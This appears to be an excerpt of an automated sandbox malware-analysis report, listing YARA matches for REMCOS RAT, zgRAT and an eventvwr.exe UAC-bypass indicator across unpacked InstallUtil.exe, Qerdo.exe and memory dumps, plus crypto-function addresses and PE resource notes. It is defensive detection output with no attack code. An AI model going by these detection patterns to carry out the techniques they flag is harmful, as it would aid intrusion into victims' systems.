Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown

.NET source code contains very large array initializations

Source: kyFBQxVbsg.exe, hlrb.cs	Large array initialization: nakj: array initializer size 710623
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrb.cs	Large array initialization: nakj: array initializer size 710623

Detected potential crypto function

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024AEAB8	0_2_024AEAB8
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024ADA50	0_2_024ADA50
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024AD778	0_2_024AD778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8EAF7	3_2_00C8EAF7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AEC8	3_2_00C8AEC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AF53	3_2_00C8AF53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8768A	3_2_00C8768A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C87698	3_2_00C87698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AF90	3_2_00C8AF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00435080	17_2_00435080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044F09C	17_2_0044F09C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043420E	17_2_0043420E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00430294	17_2_00430294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004422B0	17_2_004422B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00411466	17_2_00411466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0041A4FE	17_2_0041A4FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C57C	17_2_0043C57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00434643	17_2_00434643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00424604	17_2_00424604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004496B9	17_2_004496B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0042476D	17_2_0042476D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00432771	17_2_00432771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C7AB	17_2_0043C7AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004338FA	17_2_004338FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004239CC	17_2_004239CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C9DA	17_2_0043C9DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00434A78	17_2_00434A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0041BA96	17_2_0041BA96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00433DF6	17_2_00433DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00423F5B	17_2_00423F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044FF65	17_2_0044FF65

PE file contains strange resources

Source: kyFBQxVbsg.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Qerdo.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Uses 32bit PE files

Source: kyFBQxVbsg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
